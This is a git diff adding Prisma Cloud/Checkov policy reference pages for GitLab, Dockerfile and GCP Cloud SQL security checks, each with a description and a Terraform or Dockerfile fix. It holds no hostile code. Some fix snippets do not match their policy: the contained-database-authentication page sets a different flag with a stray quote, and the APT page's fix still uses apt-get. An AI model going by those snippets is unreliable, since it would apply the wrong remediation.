Attribute: prevent_secrets + + +[source,go] +---- +{ + "resource "gitlab_project" "example-two" { +... + push_rules { + ... ++ prevent_secrets = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/gitlab-policies.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/gitlab-policies.adoc new file mode 100644 index 000000000..7f42c203c --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/gitlab-policies.adoc @@ -0,0 +1,34 @@ +== Gitlab Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-all-gitlab-groups-require-two-factor-authentication.adoc[Gitlab organization has groups with no two factor authentication configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/gitlab/checks/two_factor_authentication.py[CKV_GITLAB_2] +|HIGH + + +|xref:ensure-gitlab-branch-protection-rules-does-not-allow-force-pushes.adoc[Gitlab branch protection rules allows force pushes] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/gitlab/checks/merge_requests_approvals.py[CKV_GITLAB_1] +|MEDIUM + + +|xref:ensure-gitlab-commits-are-signed.adoc[Gitlab project commits are not signed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py[CKV_GLB_4] +|LOW + + +|xref:ensure-gitlab-prevent-secrets-is-enabled.adoc[Gitlab project does not prevent secrets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py[CKV_GLB_3] +|MEDIUM + + +|xref:merge-requests-do-not-require-two-or-more-approvals-to-merge.adoc[Gitlab project merge has less than 2 approvals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py[CKV_GLB_1] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/merge-requests-do-not-require-two-or-more-approvals-to-merge.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/merge-requests-do-not-require-two-or-more-approvals-to-merge.adoc new file mode 100644 index 000000000..9d3510cd8 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/merge-requests-do-not-require-two-or-more-approvals-to-merge.adoc @@ -0,0 +1,57 @@ +== Gitlab project merge has less than 2 approvals +// Gitlab project merge request requires less than 2 approvals + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| befd7267-1709-4aa3-8f73-c7311610da34 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py[CKV_GLB_1] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +In GitLab, administrators can require that all merge requests receive a specific number of approving reviews before someone merges the pull request into a protected branch. +It is also possible to require approving reviews from people with write permissions in the repository or from a designated code owner. +If a collaborator attempts to merge a pull request with pending or rejected reviews into the protected branch, the collaborator will receive an error message. + +=== Fix - Buildtime + + +*Terraform* + + +* Resource: gitlab_project +* Attribute: approvals_before_merge + + +[source,go] +---- +{ + "resource "gitlab_project" "example" { +... ++ approvals_before_merge = 2 +... +}", + +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policies.adoc b/code-security/policy-reference/docker-policies/docker-policies.adoc new file mode 100644 index 000000000..7f0e4d76e --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policies.adoc @@ -0,0 +1,3 @@ +== Docker Policies + + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/docker-policy-index.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/docker-policy-index.adoc new file mode 100644 index 000000000..01aa2ed74 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/docker-policy-index.adoc @@ -0,0 +1,62 @@ +== Docker Policy Index + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-docker-apt-is-not-used.adoc[Docker APT is used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/RunUsingAPT.py[CKV_DOCKER_9] +|LOW + + +|xref:ensure-docker-workdir-values-are-absolute-paths.adoc[Docker WORKDIR values are not absolute paths] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/WorkdirIsAbsolute.py[CKV_DOCKER_10] +|LOW + + +|xref:ensure-port-22-is-not-exposed.adoc[Port 22 is exposed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/ExposePort22.py[CKV_DOCKER_1] +|LOW + + +|xref:ensure-that-a-user-for-the-container-has-been-created.adoc[A user for the container has not been created] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/UserExists.py[CKV_DOCKER_3] +|LOW + + +|xref:ensure-that-copy-is-used-instead-of-add-in-dockerfiles.adoc[Copy is not used instead of Add in Dockerfiles] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/AddExists.py[CKV_DOCKER_4] +|LOW + + +|xref:ensure-that-healthcheck-instructions-have-been-added-to-container-images.adoc[Healthcheck instructions have not been added to container images] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/HealthcheckExists.py[CKV_DOCKER_2] +|LOW + + +|xref:ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated.adoc[LABEL maintainer is used instead of MAINTAINER (deprecated)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/MaintainerExists.py[CKV_DOCKER_6] +|LOW + + +|xref:ensure-the-base-image-uses-a-non-latest-version-tag.adoc[Base image uses a latest version tag] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/ReferenceLatestTag.py[CKV_DOCKER_7] +|LOW + + +|xref:ensure-the-last-user-is-not-root.adoc[Last USER is root] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/RootUser.py[CKV_DOCKER_8] +|LOW + + +|xref:ensure-update-instructions-are-not-used-alone-in-the-dockerfile.adoc[Update instructions are used alone in a Dockerfile] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/UpdateNotAlone.py[CKV_DOCKER_5] +|LOW + +|xref:ensure-docker-from-alias-is-unique-for-multistage-builds.adoc[Docker From alias is not unique for multistage builds] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/AliasIsUnique.py[CKV_DOCKER_11] +|LOW + +|=== + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-is-not-used.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-is-not-used.adoc new file mode 100644 index 000000000..dee26335b --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-is-not-used.adoc @@ -0,0 +1,52 @@ +== Docker APT is used + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e2c80d46-7f1f-4ef8-af47-0a60a23a8624 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/RunUsingAPT.py[CKV_DOCKER_9] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +It is generally a best practice to avoid using APT (Advanced Package Tool) when working with Docker containers. +This is because APT is designed to work with traditional server-based environments, and may not be well-suited for use with containers. +Using APT with Docker containers can create potential security risks, as it may allow packages to be installed that are not designed to work with containers. +This can lead to compatibility issues and potentially compromise the security of your containers. + +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM busybox:1.0 +RUN apt-get install curl +HEALTHCHECK CMD curl --fail http://localhost:3000 || exit 1", +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-from-alias-is-unique-for-multistage-builds.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-from-alias-is-unique-for-multistage-builds.adoc new file mode 100644 index 000000000..e571a9a44 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-from-alias-is-unique-for-multistage-builds.adoc @@ -0,0 +1,50 @@ +== Docker From alias is not unique for multistage builds + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| eb4a901e-a5cc-4490-915a-8b9287425572 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/AliasIsUnique.py[CKV_DOCKER_11] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + +Using unique FROM aliases in your Docker multistage builds can help improve the security and reliability of your builds. +The FROM alias is used to specify the base image for a build stage, and using a unique alias for each stage can help prevent confusion and ensure that the correct image is being used. + +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM debian:jesse1 as build +RUN stuff + +FROM debian:jesse1 as another-alias +RUN more_stuff", +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-workdir-values-are-absolute-paths.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-workdir-values-are-absolute-paths.adoc new file mode 100644 index 000000000..17da9f3bf --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-workdir-values-are-absolute-paths.adoc @@ -0,0 +1,67 @@ +== Docker WORKDIR values are not absolute paths + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3b5a51c0-9b3d-4cc2-be84-18e6ac4aba1b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/WorkdirIsAbsolute.py[CKV_DOCKER_10] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +Using absolute paths for the WORKDIR values in your Dockerfiles can help improve the security and reliability of your builds. +The WORKDIR value specifies the working directory for the build stage, and using an absolute path ensures that the correct directory is being used. +By using absolute paths for WORKDIR, you can help prevent potential issues such as using the wrong directory for a stage, which can lead to compatibility problems and potentially compromise the security of your containers. +It can also help ensure that your builds are consistent and reliable, as you can easily identify which directory is being used for each stage. + +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM alpine:3.5 +RUN apk add --update py2-pip +RUN pip install --upgrade pip +WORKDIR /path/to/workdir +WORKDIR / +WORKDIR c:\\\\windows +WORKDIR "/path/to/workdir" +WORKDIR "c:\\\\windows" +ENV DIRPATH=/path +ENV GLASSFISH_ARCHIVE glassfish5 +WORKDIR $DIRPATH/$DIRNAME +WORKDIR ${GLASSFISH_HOME}/bin +COPY requirements.txt /usr/src/app/ +RUN pip install --no-cache-dir -r /usr/src/app/requirements.txt +COPY app.py /usr/src/app/ +COPY templates/index.html /usr/src/app/templates/ +EXPOSE 5000 +CMD ["python", "/usr/src/app/app.py"]", +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-port-22-is-not-exposed.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-port-22-is-not-exposed.adoc new file mode 100644 index 000000000..dde686465 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-port-22-is-not-exposed.adoc @@ -0,0 +1,51 @@ +== Port 22 is exposed + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8e0be113-366f-461c-9fb7-4d646ae9a509 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/ExposePort22.py[CKV_DOCKER_1] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +By exposing port 22, you may allow a bad actor to brute force their way into the system and potentially get access to the entire network. +As a best practice, restrict SSH solely to known static IP addresses. +Limit the access list to include known hosts, services, or specific employees only. + +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM busybox + +EXPOSE 8080", +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-a-user-for-the-container-has-been-created.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-a-user-for-the-container-has-been-created.adoc new file mode 100644 index 000000000..5f39ba023 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-a-user-for-the-container-has-been-created.adoc @@ -0,0 +1,52 @@ +== A user for the container has not been created + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 54c9568e-e0c1-4686-828d-b60dc8e456f8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/UserExists.py[CKV_DOCKER_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +Containers should run as a non-root user. +It is good practice to run the container as a non-root user, where possible. +This can be done either via the `USER` directive in the `Dockerfile` or through `gosu` or similar where used as part of the `CMD` or `ENTRYPOINT` directives. + +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM base + +LABEL foo="bar baz +USER me", +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-copy-is-used-instead-of-add-in-dockerfiles.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-copy-is-used-instead-of-add-in-dockerfiles.adoc new file mode 100644 index 000000000..2879225f8 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-copy-is-used-instead-of-add-in-dockerfiles.adoc @@ -0,0 +1,47 @@ +== Copy is not used instead of Add in Dockerfiles + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2985c9ff-18f7-42bb-9883-a7c3ae1f9b01 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/AddExists.py[CKV_DOCKER_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +The *Copy* instruction simply copies files from the local host machine to the container file system. +The *Add* instruction could potentially retrieve files from remote URLs and perform operations such as unpacking them. +The *Add* instruction, therefore, introduces security risks. +For example, malicious files may be directly accessed from URLs without scanning, or there may be vulnerabilities associated with decompressing them +We recommend you use the *Copy* instruction instead of the *Add* instruction in the Dockerfile. + +=== Fix - Buildtime + + +*Dockerfile* + + +[,Dockerfile] +---- +- ADD config.txt /app/ +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-healthcheck-instructions-have-been-added-to-container-images.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-healthcheck-instructions-have-been-added-to-container-images.adoc new file mode 100644 index 000000000..969839cb0 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-healthcheck-instructions-have-been-added-to-container-images.adoc @@ -0,0 +1,54 @@ +== Healthcheck instructions have not been added to container images + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2457c548-1ac6-4f6e-a6e5-d6a1ad318720 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/HealthcheckExists.py[CKV_DOCKER_2] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +We recommend that you add the HEALTHCHECK instruction to your Docker container images to ensure that health checks are executed against running containers. +An important security control is that of availability. +Adding the HEALTHCHECK instruction to your container image ensures that the Docker engine periodically checks the running container instances against that instruction to ensure that containers are still operational. +Based on the results of the health check, the Docker engine could terminate containers which are not responding correctly, and instantiate new ones. + +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM base + +LABEL foo="bar baz +USER me +HEALTHCHECK CMD curl --fail http://localhost:3000 || exit 1", +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated.adoc new file mode 100644 index 000000000..4a19f85d1 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated.adoc @@ -0,0 +1,44 @@ +== LABEL maintainer is used instead of MAINTAINER (deprecated) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 395cad1d-c9ff-4c55-a199-45cd2eba6d6c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/MaintainerExists.py[CKV_DOCKER_6] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +The LABEL instruction is much more flexible and recommended to replace the MAINTAINER (deprecated) instruction in a Dockerfile. + +=== Fix - Buildtime + + +*Docker* + + +[,Dockerfile] +---- +FROM base +- MAINTAINER bad +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-base-image-uses-a-non-latest-version-tag.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-base-image-uses-a-non-latest-version-tag.adoc new file mode 100644 index 000000000..78d94740d --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-base-image-uses-a-non-latest-version-tag.adoc @@ -0,0 +1,47 @@ +== Base image uses a latest version tag + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a5d5094-4d50-4844-8ebe-d0dbda6f607a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/ReferenceLatestTag.py[CKV_DOCKER_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +When possible, it is recommended to pin the version for the base image in your Dockerfiles. +There are a number of potential issues that may be caused when using the `latest` tag. +Since `latest` is the default tag when a tag is not specified, it does not automatically refer to the latest version of the image. +This can lead to the use of outdated images and in the case of production deployments, using a dynamic version can cause unexpected behavior and difficulty in determining which version is being currently used. +It is best practice to be specific as possible about what is running to make operations predictable and reliable + +=== Fix - Buildtime + + +*Dockerfile* + + +[,Dockerfile] +---- +- FROM alpine:latest +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-last-user-is-not-root.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-last-user-is-not-root.adoc new file mode 100644 index 000000000..7d03b8492 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-the-last-user-is-not-root.adoc @@ -0,0 +1,45 @@ +== Last USER is root + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| dcbdd1fd-5df0-4800-9d03-5fdbe2a5c401 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/RootUser.py[CKV_DOCKER_8] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +The Docker containers by default run with the root privilege and so does the application that runs inside the container. +This is a major concern from the security perspective because hackers can gain root access to the Docker host by hacking the application running inside the container. + +=== Fix - Buildtime + + +*Dockerfile Remove `USER root` or add a non-root user after.* + + +[,Dockerfile] +---- +FROM base +- USER root +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-update-instructions-are-not-used-alone-in-the-dockerfile.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-update-instructions-are-not-used-alone-in-the-dockerfile.adoc new file mode 100644 index 000000000..1e5abae21 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-update-instructions-are-not-used-alone-in-the-dockerfile.adoc @@ -0,0 +1,58 @@ +== Update instructions are used alone in a Dockerfile + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7cc86b56-dbe0-45a4-98d0-1b982cbce03c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/UpdateNotAlone.py[CKV_DOCKER_5] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +You should not use OS package manager update instructions such as `apt-get update` or `yum update` either alone or in a single line in the Dockerfile. +Adding update instructions in a single line on the Dockerfile will cause the update layer to be cached. +When you then build any image later using the same instruction, this will cause the previously cached update layer to be used, potentially preventing any fresh updates from being applied to later builds. + +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM base + +RUN apt-get update \\ + && apt-get install -y --no-install-recommends foo \\ + && echo gooo + +RUN apk update \\ + && apk add --no-cache suuu looo + +RUN apk --update add moo", +} +---- + diff --git a/code-security/policy-reference/get-started-code-sec-policies/get-started-code-sec-policies.adoc b/code-security/policy-reference/get-started-code-sec-policies/get-started-code-sec-policies.adoc new file mode 100644 index 000000000..687b7504c --- /dev/null +++ b/code-security/policy-reference/get-started-code-sec-policies/get-started-code-sec-policies.adoc @@ -0,0 +1,10 @@ +== Prisma Cloud Code Security Policy Reference + +Prisma Cloud Code Security offers a comprehensive scanning mechanism for detecting potential security issues that may arise in various aspects of software development. The scanning process is designed to cover a wide range of areas such as infrastructure as code, open source packages, and secrets security. + +On Prisma Cloud, a policy is a set of one or more constraints or conditions that must be adhered to. Prisma Cloud provides predefined policies for configurations and access controls that adhere to established security best practices. These Prisma Cloud policies are shipped out-of-the-box and cannot be modified. +If you want to create custom policies for build-time checks, see https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-code-security/scan-monitor/custom-build-policies[custom build policies]. + +This documentation includes information about the specific reasons for a policy violation, as well as actionable suggestions for resolving any issues that were detected during the code scanning process. The documentation also provides links to the Checkov repository for the code that represents the policy. +While some of the configuration policies in this document enable you to perform checks in the run and build phase of your resource deployment, the details in this documentation are only for the build phase of the policy. +On the Prisma Cloud management console, if you want to find all policies available for the build phase set the search filter for *Policy Sub Type* to *Build*. See https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/prisma-cloud-policies/manage-prisma-cloud-policies.html[manage policies] for details. diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-1.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-1.adoc new file mode 100644 index 000000000..3f52538b5 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-1.adoc @@ -0,0 +1,108 @@ +== GCP MySQL instance with local_infile database flag is not disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 558185cd-8704-4709-8bea-e6c692f26d00 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py[CKV_GCP_50] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The *local_infile* database flag controls the server-side LOCAL capability for LOAD DATA statements. +Depending on the *local_infile* setting, the server refuses or permits local data loading by clients that have LOCAL enabled on the client side. +To explicitly cause the server to refuse LOAD DATA LOCAL statements start *mysqld* with *local_infile* disabled, regardless of how client programs and libraries are configured at build time or runtime. +*local_infile* can also be set at runtime. +We recommended you set the *local_infile* database flag for a Cloud SQL MySQL instance to *off* to address the security issues associated with the flag. + + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * MySQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * local_infile* from the drop-down menu, and set its value to * off*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database instances using the following command: `gcloud sql instances list` + +. Configure the local_infile database flag for every Cloud SQL Mysql database instance using the below command: `gcloud sql instances patch INSTANCE_NAME --database-flags local_infile=off` ++ +NOTE: This command will overwrite all database flags previously set. To keep those flags, and add new ones, include the values for all flags to be set on the instance.Any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (*=*). + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "MYSQL_* " settings::database_flags: key:"local_infile", value: by default set to "on" + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "MYSQL_8_0" + region = "us-central1" + + settings { ++ database_flags { ++ name = "local_infile" ++ value = "off" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-10.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-10.adoc new file mode 100644 index 000000000..0aed396d1 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-10.adoc @@ -0,0 +1,116 @@ +== GCP SQL Server instance database flag 'contained database authentication' is enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7e105686-9939-48e8-8e76-bfdf42b75ef6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py[CKV_GCP_59] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A contained database includes all database settings and metadata required to define the database. +It has no configuration dependencies on the instance of the Database Engine where the database is installed. +Users can connect to the database without authenticating a login at the Database Engine level. +Isolating the database from the Database Engine makes it possible to easily move the database to another instance of SQL Server. +Contained databases have some unique threats that should be understood and mitigated by SQL Server Database Engine administrators. +Most of the threats are related to the USER WITH PASSWORD authentication process, which moves the authentication boundary from the Database Engine level to the database level, +We recommend you ensure the *contained database authentication* database flag for SQL Server database instances is disabled. +To achieve this, set the value to *Off*. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Select the * PostgreSQL instance* where the database flag needs to be enabled. + +. Click * Edit*. + +. Scroll down to the * Flags* section. + +. To set a flag that has not been set on the instance before, click * Add item*. + +. Select the flag * contained database authentication* from the drop-down menu, and set its value to * Off*. + +. Click * Save*. + +. Confirm the changes in the * Flags* section on the * Overview* page. + + +* CLI Command* + + + +. List all Cloud SQL database Instances using the following command: `gcloud sql instances list` + +. Configure the * contained database authentication* database flag for every Cloud SQL SQL Server database instance using the below command: +---- +gcloud sql instances patch INSTANCE_NAME +--database-flags "contained database authentication=off" +---- ++ +NOTE: This command will overwrite all database flags previously set. To keep these flags, and add new ones, include the values for all flags to be set on the instance. +Any flag not specifically included is set to its default value. +For flags that do not take a value, specify the flag name followed by an equals sign (*=*). + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance + +* *Arguments:* database_version = "SQLSERVER_* " settings::database_flags: key:"contained database authentication", value: by default set to "on" + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "SQLSERVER_2017_STANDARD" + region = "us-central1" + + settings { ++ database_flags { ++ name = "cross db ownership chaining"" ++ value = "off" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-11.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-11.adoc new file mode 100644 index 000000000..204550af8 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-11.adoc @@ -0,0 +1,93 @@ +== GCP Cloud SQL database instances have public IPs + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9de130c6-1748-421c-b2c1-c8ad6f601912 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py[CKV_GCP_60] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +To lower the organization's attack surface, Cloud SQL databases should not have public IPs. +Private IPs provide improved network security and lower latency for your application. +We recommend you configure Second Generation SQL instances to use private IPs instead of public IPs. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/sql/instances [Cloud SQL Instances]. + +. Click the instance name to open its *Instance details **page. + +. Select * Connections*. + +. Clear the * Public IP* checkbox. + +. To update the instance, click * Save*. + + +* CLI Command* + + + +. For every instance remove its public IP and assign a private IP instead: `gcloud beta sql instances patch INSTANCE_NAME --network=VPC_NETWOR_NAME --no- assign-ip` + +. Confirm the changes using the following command: `gcloud sql instances describe INSTANCE_NAME` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* database_version = "SQLSERVER_* " settings::ip_configuration: by default set to "true" + + +[source,go] +---- +{ + "resource "google_sql_database_instance" "default" { + name = "master-instance" + database_version = "SQLSERVER_2017_STANDARD" + region = "us-central1" + + settings { ++ ip_configuration{ ++ ipv4_enabled = "false" + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-2.adoc 